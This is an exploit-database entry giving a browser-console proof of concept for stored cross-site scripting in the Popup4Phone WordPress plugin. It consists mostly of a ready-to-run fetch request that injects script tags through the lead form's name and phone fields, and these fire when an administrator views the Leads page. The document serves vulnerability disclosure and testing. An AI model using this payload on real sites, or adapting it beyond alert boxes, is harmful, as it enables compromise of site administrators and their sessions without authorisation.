## https://sploitus.com/exploit?id=WPEX-ID:81DBB5C0-CCDD-4AF1-B2F2-71CB1B37FE93
Run the following JavaScript in the browser console:
```
fetch("/", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "popup4phone%5Bws_pages_submit_url%5D=&popup4phone%5Bws_pages_submit_title%5D=Popup4Phone+%E2%80%93+WPScan+Vulnerability+Testbench&popup4phone%5Bname%5D=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&popup4phone%5Bphone%5D=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&popup4phone%5Bemail%5D=test%40example.com&popup4phone%5Bmessage%5D=test&ajax=1",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
```
After running the JavaScript, log in as an admin and browse to "Popup4Phone > Leads" and see the XSS